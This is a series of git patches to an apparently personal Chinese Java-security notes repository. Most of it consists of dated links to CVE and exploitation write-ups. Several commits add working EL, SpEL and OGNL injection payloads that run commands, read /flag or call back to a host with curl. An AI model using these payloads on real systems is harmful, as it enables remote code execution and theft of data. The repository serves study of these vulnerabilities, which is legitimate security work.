@@ -0,0 +1,21 @@ +# apache storm + +## 环境搭建 + +https://blog.51cto.com/u_13870740/3445168 + +https://github.com/heibaiying/BigData-Notes/blob/master/notes/installation/Storm%E5%8D%95%E6%9C%BA%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA.md + +``` +nohup bash storm dev-zookeeper & bash storm nimbus & bash storm supervisor &bash storm ui & bash storm logviewer & +``` + +## 漏洞分析 + +https://paper.seebug.org/1780/#0x03 + +https://blog.noah.360.net/apache-storm-vulnerability-analysis/ + +https://y4er.com/posts/apache-storm-two-cve/ + +**自己尝试反序列化并没有成功cb,环境是2.1.0** From 5bad93020461157ec8398cbcac82898febf3378d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 27 Oct 2022 14:19:26 +0800 Subject: [PATCH 094/257] Update Readme.md --- shell/EL/Readme.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/shell/EL/Readme.md b/shell/EL/Readme.md index 56f6390..66df221 100644 --- a/shell/EL/Readme.md +++ b/shell/EL/Readme.md @@ -39,3 +39,9 @@ ${''.class.forName('com.sun.org.apache.bcel.internal.util.ClassLoader').newInsta ``` **需要注意jdk版本问题可能没有bcel类** 理论上spel表达式可以用的payLoad 这里也可以利用 +## bypass + +https://forum.butian.net/share/1880 +```java +${""[param.a]()[param.b](param.c)[param.d]()[param.e](param.f)[param.g](param.h)} +``` From 9c0a916079cd1fcde6fd6b7ebfa50ff2ecd4d209 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 27 Oct 2022 20:42:56 +0800 Subject: [PATCH 095/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index ff2b853..706832e 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -187,3 +187,4 @@ + 2022/10/20 [如何更加精确的检测Tomcat AJP文件包含漏洞(CVE-2020-1938)](https://gv7.me/articles/2020/how-to-detect-tomcat-ajp-lfi-more-accurately/) **ajp的利用** + 2022/10/25 [Python PIP自解压的命令执行](https://mp.weixin.qq.com/s/xFY6VYzrA4RryH1agC8zUw) **包管理工具的命令执行** [node npm 中的preinstall 命令执行](https://bytedance.feishu.cn/docx/doxcnWmtkIItrGokckfo1puBtCh) + 2022/10/26 [这是我见过最复杂的URL了](https://cn-sec.com/archives/1372213.html) ++ 2022/10/27 [【技术干货】CVE-2022-34916 Apache Flume 远程代码执行漏洞分析](https://mp.weixin.qq.com/s/zS2TBfBsK1gzkLxs5u3GmQ) From df7e01ec98e9fc65c8a1461a39acc71188918cac Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 29 Oct 2022 01:33:25 +0800 Subject: [PATCH 096/257] Create Readme.md --- wso2/Readme.md | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 wso2/Readme.md diff --git a/wso2/Readme.md b/wso2/Readme.md new file mode 100644 index 0000000..1e02983 --- /dev/null +++ b/wso2/Readme.md @@ -0,0 +1,25 @@ +# wso2 + +## CVE-2022-29464 + +### 文件上传 + +路径匹配处理类 + +![image](https://user-images.githubusercontent.com/63966847/198697817-2f3055f2-5918-4336-bf73-71e500a1050b.png) + +![image](https://user-images.githubusercontent.com/63966847/198697831-7aeb695f-b02d-4a77-a403-562a37b4245f.png) + +### fix + +1.加了权限认证 + +2.对上传文件的路径做校验 + +### 参考 + +https://github.com/wso2/carbon-kernel/pull/3152/commits/13795df0a5b6a2206fd0338abfff057a7b99e1bb + +https://docs.wso2.com/m/mobile.action#page/180952746 + +https://www.anquanke.com/post/id/273528?from=timeline From eb4ece311d40e5e7ee61cdeec8a51fba4d0aca5d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 29 Oct 2022 11:14:30 +0800 Subject: [PATCH 097/257] Update Readme.md --- shell/SPEL/Readme.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/shell/SPEL/Readme.md b/shell/SPEL/Readme.md index b0acffd..9487637 100644 --- a/shell/SPEL/Readme.md +++ b/shell/SPEL/Readme.md 
@@ -110,6 +110,11 @@ print(')}') 其他bypass: https://xz.aliyun.com/t/9245 +## springboot回显 +``` +Java.type("org.springframework.web.context.request.RequestContextHolder").currentRequestAttributes().getResponse().addHeader("test",new java.lang.String(Java.type("sun.misc.IOUtils").readFully(new java.io.FileInputStream("/flag"),1024,false))); +``` + ## 参考 > https://xz.aliyun.com/t/9245 **可以使用#request.getRequestedSessionId() 或者 #request.getHeader('User-Agent') 反正可以使用request对象或者respose** > From 914df006509b353eae398034ef49839d3df8a4f0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 29 Oct 2022 11:34:43 +0800 Subject: [PATCH 098/257] Update Readme.md --- shell/OGNL/Readme.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/shell/OGNL/Readme.md b/shell/OGNL/Readme.md index 1c52c1b..b09dfcf 100644 --- a/shell/OGNL/Readme.md +++ b/shell/OGNL/Readme.md @@ -1,5 +1,7 @@ # OGNL bypass ```java +${@jdk.jshell.JShell@create().eval('java.lang.Runtime.getRuntime().exec("")} + new javax.script.ScriptEngineManager().getEngineByName("js").eval(此处的Payload可以进行unicode编码) new javax.script.ScriptEngineManager().getEngineByName("js").eval("new j\u0061va.lang.ProcessBuilder['(java.l\u0061ng.String[])'](['cmd.exe','/c','calc']).start()\u003B"); From bca87f5ed1a77de4ffb0b4474be893d412485607 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 29 Oct 2022 11:36:21 +0800 Subject: [PATCH 099/257] Update Readme.md --- shell/SPEL/Readme.md | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/shell/SPEL/Readme.md b/shell/SPEL/Readme.md index 9487637..82b8808 100644 --- a/shell/SPEL/Readme.md +++ b/shell/SPEL/Readme.md 
@@ -83,7 +83,10 @@ T(java.nio.file.Files).write(T(java.nio.file.Paths).get(T(java.net.URI).create(" Nuxeo RCE ''['class'].forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(''['class'].forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),'curl 172.17.0.1:9898') - + +jdk9+ + +T(jdk.jshell.JShell).Methods[6].invoke(null,'').eval('xxxx'); ``` 字符串绕过 From 8ec5138ab18ade5003102b0fadc937aaf8ad021a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 30 Oct 2022 21:57:11 +0800 Subject: [PATCH 100/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 706832e..b25c00c 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -188,3 +188,4 @@ + 2022/10/25 [Python PIP自解压的命令执行](https://mp.weixin.qq.com/s/xFY6VYzrA4RryH1agC8zUw) **包管理工具的命令执行** [node npm 中的preinstall 命令执行](https://bytedance.feishu.cn/docx/doxcnWmtkIItrGokckfo1puBtCh) + 2022/10/26 [这是我见过最复杂的URL了](https://cn-sec.com/archives/1372213.html) + 2022/10/27 [【技术干货】CVE-2022-34916 Apache Flume 远程代码执行漏洞分析](https://mp.weixin.qq.com/s/zS2TBfBsK1gzkLxs5u3GmQ) ++ 2022/10/30 [Beware the Nashorn: ClassFilter gotchas](https://mbechler.github.io/2019/03/02/Beware-the-Nashorn/) From ef725d97fcc82ec08ec65de66b2eb8460ca49c47 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 1 Nov 2022 20:46:54 +0800 Subject: [PATCH 101/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b25c00c..7ce9d99 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -189,3 +189,4 @@ + 2022/10/26 [这是我见过最复杂的URL了](https://cn-sec.com/archives/1372213.html) + 2022/10/27 [【技术干货】CVE-2022-34916 Apache Flume 远程代码执行漏洞分析](https://mp.weixin.qq.com/s/zS2TBfBsK1gzkLxs5u3GmQ) + 2022/10/30 [Beware the Nashorn: ClassFilter gotchas](https://mbechler.github.io/2019/03/02/Beware-the-Nashorn/) ++ 2022/11/01 [红队第10篇:coldfusion反序列化过waf改exp拿靶标的艰难过程](https://www.moonsec.com/5362.html) From 6443c0b76762056b6cf3892ebe727fd9aafd25b0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 2 Nov 2022 17:43:12 +0800 Subject: [PATCH 102/257] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index afcf094..e2e39f6 100644 --- a/README.md +++ b/README.md @@ -23,7 +23,7 @@ + 2022/01/16 [添加CAS漏洞学习](CAS) 💛 💙 💜 ❤️ 💚 + 2022/03/18 [添加Solr利用exp](Solr) 💛 💙 💜 ❤️ 💚 + 2022/10/07 [添加jvm的学习笔记](JVM) 💛 💙 💜 ❤️ 💚 -+ 2022/10/07 [添加JDK里面的trick](JDK) 💛 💙 💜 ❤️ 💚 ++ 2022/10/07 [添加JDK里面的trick](Jdk) 💛 💙 💜 ❤️ 💚 From ed0de079fba2b2ebbd62fcd7b614fed062fc40d1 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 3 Nov 2022 17:18:16 +0800 Subject: [PATCH 103/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 7ce9d99..fbe1161 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -190,3 +190,4 @@ + 2022/10/27 [【技术干货】CVE-2022-34916 Apache Flume 远程代码执行漏洞分析](https://mp.weixin.qq.com/s/zS2TBfBsK1gzkLxs5u3GmQ) + 2022/10/30 [Beware the Nashorn: ClassFilter gotchas](https://mbechler.github.io/2019/03/02/Beware-the-Nashorn/) + 2022/11/01 [红队第10篇:coldfusion反序列化过waf改exp拿靶标的艰难过程](https://www.moonsec.com/5362.html) ++ 2022/11/03 [hw打点之某创中间件](https://mp.weixin.qq.com/s/D-LuR33WKlzRjo0s75TFSQ) 
From e686af6a063a976db62edd139ee49895e4458fc1 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 6 Nov 2022 19:08:20 +0800 Subject: [PATCH 104/257] Update Readme.md --- "java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" index 63f06c2..34fce36 100644 --- "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" +++ "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" @@ -28,3 +28,4 @@ https://www.sec-in.com/author/8 这个师傅太猛了 + 2022/10/08 [实战 | 一次成功的子域名劫持](https://mp.weixin.qq.com/s/xA6OVbeQrCgeYBWMtkvWVA) **学习** + 2022/10/22 [上传包可“绕过”Java过滤器的检查?](https://gv7.me/articles/2019/why-can-multipart-post-bypass-java-filter/) **遇到了post请求有waf可以试一试文件上传的方法传递参数** + 2022/10/22 [burpsuite保存现有数据包记录&导入之前的抓包记录](https://blog.csdn.net/Fly_hps/article/details/88854111) [148处XSS你如何提交给开发修复?](https://gv7.me/articles/2017/how-do-to-submit-148-xss-vulnerabilities/) **bp的保存数据** ++ 2022/11/06 [【干货分享】五分钟教你挖掘小程序漏洞](https://mp.weixin.qq.com/s/95YiN8XJLGPUS5ykBUsmAg【干货分享】五分钟教你挖掘小程序漏洞) **小程序挖掘** From dfcc57324dd22bee09bdfa5b42232ea4e5b40f69 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 6 Nov 2022 20:53:37 +0800 Subject: [PATCH 105/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index fbe1161..a138ee1 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -191,3 +191,4 @@ + 2022/10/30 [Beware the Nashorn: ClassFilter gotchas](https://mbechler.github.io/2019/03/02/Beware-the-Nashorn/) + 2022/11/01 [红队第10篇:coldfusion反序列化过waf改exp拿靶标的艰难过程](https://www.moonsec.com/5362.html) + 2022/11/03 [hw打点之某创中间件](https://mp.weixin.qq.com/s/D-LuR33WKlzRjo0s75TFSQ) ++ 2022/11/06 [看我如何再一次駭進 Facebook,一個在 MobileIron MDM 上的遠端程式碼執行漏洞!](https://devco.re/blog/2020/09/12/how-I-hacked-Facebook-again-unauthenticated-RCE-on-MobileIron-MDM/) 好np啊 From 05dd9a6d4812c96a7f2a0a5efc813d4d2ecd1927 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 6 Nov 2022 21:29:45 +0800 Subject: [PATCH 106/257] Update Readme.md --- shell/EL/Readme.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/shell/EL/Readme.md b/shell/EL/Readme.md index 66df221..dfd1a79 100644 --- a/shell/EL/Readme.md +++ b/shell/EL/Readme.md @@ -45,3 +45,5 @@ https://forum.butian.net/share/1880 ```java ${""[param.a]()[param.b](param.c)[param.d]()[param.e](param.f)[param.g](param.h)} ``` + +https://blog.orange.tw/2018/08/how-i-chained-4-bugs-features-into-rce-on-amazon.html From 5b42040b3cdf4f8167f5a54026170aa85b8a4589 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 6 Nov 2022 21:31:46 +0800 Subject: [PATCH 107/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a138ee1..54be93c 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -192,3 +192,4 @@ + 2022/11/01 [红队第10篇:coldfusion反序列化过waf改exp拿靶标的艰难过程](https://www.moonsec.com/5362.html) + 2022/11/03 [hw打点之某创中间件](https://mp.weixin.qq.com/s/D-LuR33WKlzRjo0s75TFSQ) + 2022/11/06 [看我如何再一次駭進 Facebook,一個在 MobileIron MDM 上的遠端程式碼執行漏洞!](https://devco.re/blog/2020/09/12/how-I-hacked-Facebook-again-unauthenticated-RCE-on-MobileIron-MDM/) 好np啊 ++ 2022/11/06 [How I Chained 4 Bugs(Features?) into RCE on Amazon Collaboration System](https://blog.orange.tw/2018/08/how-i-chained-4-bugs-features-into-rce-on-amazon.html) **真的np** From 05d5ae707ee8744edd830bafc3ee2e7f10cdfb31 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 8 Nov 2022 00:15:20 +0800 Subject: [PATCH 108/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 54be93c..857b71e 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -193,3 +193,4 @@ + 2022/11/03 [hw打点之某创中间件](https://mp.weixin.qq.com/s/D-LuR33WKlzRjo0s75TFSQ) + 2022/11/06 [看我如何再一次駭進 Facebook,一個在 MobileIron MDM 上的遠端程式碼執行漏洞!](https://devco.re/blog/2020/09/12/how-I-hacked-Facebook-again-unauthenticated-RCE-on-MobileIron-MDM/) 好np啊 + 2022/11/06 [How I Chained 4 Bugs(Features?) into RCE on Amazon Collaboration System](https://blog.orange.tw/2018/08/how-i-chained-4-bugs-features-into-rce-on-amazon.html) **真的np** ++ 2022/11/08 [常见安全工具的扫描流量特征分析与检测](https://mp.weixin.qq.com/s/JyFXNtIwludyDBNQc0-oKw) From cfff1e6afcf4ff447b456036ca4a445b6459b0a7 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 9 Nov 2022 13:08:37 +0800 Subject: [PATCH 109/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 857b71e..cb6d354 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -194,3 +194,4 @@ + 2022/11/06 [看我如何再一次駭進 Facebook,一個在 MobileIron MDM 上的遠端程式碼執行漏洞!](https://devco.re/blog/2020/09/12/how-I-hacked-Facebook-again-unauthenticated-RCE-on-MobileIron-MDM/) 好np啊 + 2022/11/06 [How I Chained 4 Bugs(Features?) into RCE on Amazon Collaboration System](https://blog.orange.tw/2018/08/how-i-chained-4-bugs-features-into-rce-on-amazon.html) **真的np** + 2022/11/08 [常见安全工具的扫描流量特征分析与检测](https://mp.weixin.qq.com/s/JyFXNtIwludyDBNQc0-oKw) ++ 2022/11/09 [Bypass Authentication BurpSuit 插件](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485029&idx=1&sn=c1a45885d1037f902f172da08d84341d&chksm=c053fd4ff72474590add9334e497b5c08895e564d3a913cf7b20c9a707d204cca47ed160cca9&mpshare=1&scene=23&srcid=1109NLqGHLO9SdPBfzlUhLUT&sharer_sharetime=1667932033444&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **bp 插件** From 98b3345681289c1b407d99630769741bc5b12221 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 9 Nov 2022 13:18:21 +0800 Subject: [PATCH 110/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index cb6d354..a119bff 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -195,3 +195,4 @@ + 2022/11/06 [How I Chained 4 Bugs(Features?) into RCE on Amazon Collaboration System](https://blog.orange.tw/2018/08/how-i-chained-4-bugs-features-into-rce-on-amazon.html) **真的np** + 2022/11/08 [常见安全工具的扫描流量特征分析与检测](https://mp.weixin.qq.com/s/JyFXNtIwludyDBNQc0-oKw) + 2022/11/09 [Bypass Authentication BurpSuit 插件](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485029&idx=1&sn=c1a45885d1037f902f172da08d84341d&chksm=c053fd4ff72474590add9334e497b5c08895e564d3a913cf7b20c9a707d204cca47ed160cca9&mpshare=1&scene=23&srcid=1109NLqGHLO9SdPBfzlUhLUT&sharer_sharetime=1667932033444&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **bp 插件** ++ 2022/11/09 [Kcon议题分析《高级攻防下的WebShell》分析 —— Java Agent 通用内存马](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247484929&idx=1&sn=39ed4ec26af5a3d40ccefbf340bd295d&chksm=c053fd2bf724743d0a4cf2e5f995c631a33cba1262dfa7cd8bd09966fd71b5f867e6212233c9&mpshare=1&scene=23&srcid=1109ne3bmFyb2NFKi1ISzS1y&sharer_sharetime=1667931921863&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From fafb5256e118e107cd4bce89a584e531465fb42a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 10 Nov 2022 16:15:53 +0800 Subject: [PATCH 111/257] Create CVE-2021-33037.md --- tomcat/Smuggling/CVE-2021-33037.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 tomcat/Smuggling/CVE-2021-33037.md diff --git a/tomcat/Smuggling/CVE-2021-33037.md b/tomcat/Smuggling/CVE-2021-33037.md new file mode 100644 index 0000000..7905c08 --- /dev/null +++ b/tomcat/Smuggling/CVE-2021-33037.md @@ -0,0 +1,4 @@ +Apache Tomcat HTTP请求走私(CVE-2021-33037)漏洞分析 + + +[Apache Tomcat HTTP请求走私(CVE-2021-33037)漏洞分析](https://xz.aliyun.com/t/9866) From 4c3c193f5a638d7a02dfbddc24cd0a7ea74a3cd7 Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 10 Nov 2022 21:43:42 +0800 Subject: [PATCH 112/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a119bff..6f37201 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -196,3 +196,4 @@ + 2022/11/08 [常见安全工具的扫描流量特征分析与检测](https://mp.weixin.qq.com/s/JyFXNtIwludyDBNQc0-oKw) + 2022/11/09 [Bypass Authentication BurpSuit 插件](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485029&idx=1&sn=c1a45885d1037f902f172da08d84341d&chksm=c053fd4ff72474590add9334e497b5c08895e564d3a913cf7b20c9a707d204cca47ed160cca9&mpshare=1&scene=23&srcid=1109NLqGHLO9SdPBfzlUhLUT&sharer_sharetime=1667932033444&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **bp 插件** + 2022/11/09 [Kcon议题分析《高级攻防下的WebShell》分析 —— Java Agent 通用内存马](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247484929&idx=1&sn=39ed4ec26af5a3d40ccefbf340bd295d&chksm=c053fd2bf724743d0a4cf2e5f995c631a33cba1262dfa7cd8bd09966fd71b5f867e6212233c9&mpshare=1&scene=23&srcid=1109ne3bmFyb2NFKi1ISzS1y&sharer_sharetime=1667931921863&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/11/10 [Druid远程代码执行漏洞分析(CVE-2021-25646)](https://xz.aliyun.com/t/9229) **简单的说就是使用@JacksonInject注解的时候,可以通过""去匹配参数从而控制值。该漏洞是控制了config 为 true** From 55c1eb7eb95ba9523c46bef809589a2fa0deffcb Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 10 Nov 2022 21:47:47 +0800 Subject: [PATCH 113/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 6f37201..f24bd56 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -196,4 +196,4 @@ + 2022/11/08 [常见安全工具的扫描流量特征分析与检测](https://mp.weixin.qq.com/s/JyFXNtIwludyDBNQc0-oKw) + 2022/11/09 [Bypass Authentication BurpSuit 插件](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485029&idx=1&sn=c1a45885d1037f902f172da08d84341d&chksm=c053fd4ff72474590add9334e497b5c08895e564d3a913cf7b20c9a707d204cca47ed160cca9&mpshare=1&scene=23&srcid=1109NLqGHLO9SdPBfzlUhLUT&sharer_sharetime=1667932033444&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **bp 插件** + 2022/11/09 [Kcon议题分析《高级攻防下的WebShell》分析 —— Java Agent 通用内存马](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247484929&idx=1&sn=39ed4ec26af5a3d40ccefbf340bd295d&chksm=c053fd2bf724743d0a4cf2e5f995c631a33cba1262dfa7cd8bd09966fd71b5f867e6212233c9&mpshare=1&scene=23&srcid=1109ne3bmFyb2NFKi1ISzS1y&sharer_sharetime=1667931921863&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) -+ 2022/11/10 [Druid远程代码执行漏洞分析(CVE-2021-25646)](https://xz.aliyun.com/t/9229) **简单的说就是使用@JacksonInject注解的时候,可以通过""去匹配参数从而控制值。该漏洞是控制了config 为 true** ++ 2022/11/10 [Druid远程代码执行漏洞分析(CVE-2021-25646)](https://xz.aliyun.com/t/9229) **简单的说就是使用@JacksonInject注解的时候,可以通过""去匹配参数从而控制值。该漏洞是控制了config 为 true.最后漏洞的利用点就是利用config为true之后绕过了对于config的检查** From 07720c45c22bba5002bf9d3a7623725d59d8ef80 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 11 Nov 2022 11:37:18 +0800 Subject: [PATCH 114/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index f24bd56..59bfd5f 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -197,3 +197,4 @@ + 2022/11/09 [Bypass Authentication BurpSuit 插件](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247485029&idx=1&sn=c1a45885d1037f902f172da08d84341d&chksm=c053fd4ff72474590add9334e497b5c08895e564d3a913cf7b20c9a707d204cca47ed160cca9&mpshare=1&scene=23&srcid=1109NLqGHLO9SdPBfzlUhLUT&sharer_sharetime=1667932033444&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **bp 插件** + 2022/11/09 [Kcon议题分析《高级攻防下的WebShell》分析 —— Java Agent 通用内存马](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247484929&idx=1&sn=39ed4ec26af5a3d40ccefbf340bd295d&chksm=c053fd2bf724743d0a4cf2e5f995c631a33cba1262dfa7cd8bd09966fd71b5f867e6212233c9&mpshare=1&scene=23&srcid=1109ne3bmFyb2NFKi1ISzS1y&sharer_sharetime=1667931921863&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/11/10 [Druid远程代码执行漏洞分析(CVE-2021-25646)](https://xz.aliyun.com/t/9229) **简单的说就是使用@JacksonInject注解的时候,可以通过""去匹配参数从而控制值。该漏洞是控制了config 为 true.最后漏洞的利用点就是利用config为true之后绕过了对于config的检查** ++ 2022/11/11 [从SPI机制到JDBC后门实现](https://mp.weixin.qq.com/s/vhKWEz9hwhdinm4TEtLUqw) From 66cf07e40861319e9496f869f5f0bc076b502ca9 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 11 Nov 2022 21:25:47 +0800 Subject: [PATCH 115/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 59bfd5f..3622e3f 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -198,3 +198,4 @@ + 2022/11/09 [Kcon议题分析《高级攻防下的WebShell》分析 —— Java Agent 通用内存马](https://mp.weixin.qq.com/s?__biz=Mzg5OTQ3NzA2MQ==&mid=2247484929&idx=1&sn=39ed4ec26af5a3d40ccefbf340bd295d&chksm=c053fd2bf724743d0a4cf2e5f995c631a33cba1262dfa7cd8bd09966fd71b5f867e6212233c9&mpshare=1&scene=23&srcid=1109ne3bmFyb2NFKi1ISzS1y&sharer_sharetime=1667931921863&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/11/10 [Druid远程代码执行漏洞分析(CVE-2021-25646)](https://xz.aliyun.com/t/9229) **简单的说就是使用@JacksonInject注解的时候,可以通过""去匹配参数从而控制值。该漏洞是控制了config 为 true.最后漏洞的利用点就是利用config为true之后绕过了对于config的检查** + 2022/11/11 [从SPI机制到JDBC后门实现](https://mp.weixin.qq.com/s/vhKWEz9hwhdinm4TEtLUqw) ++ 2022/11/11 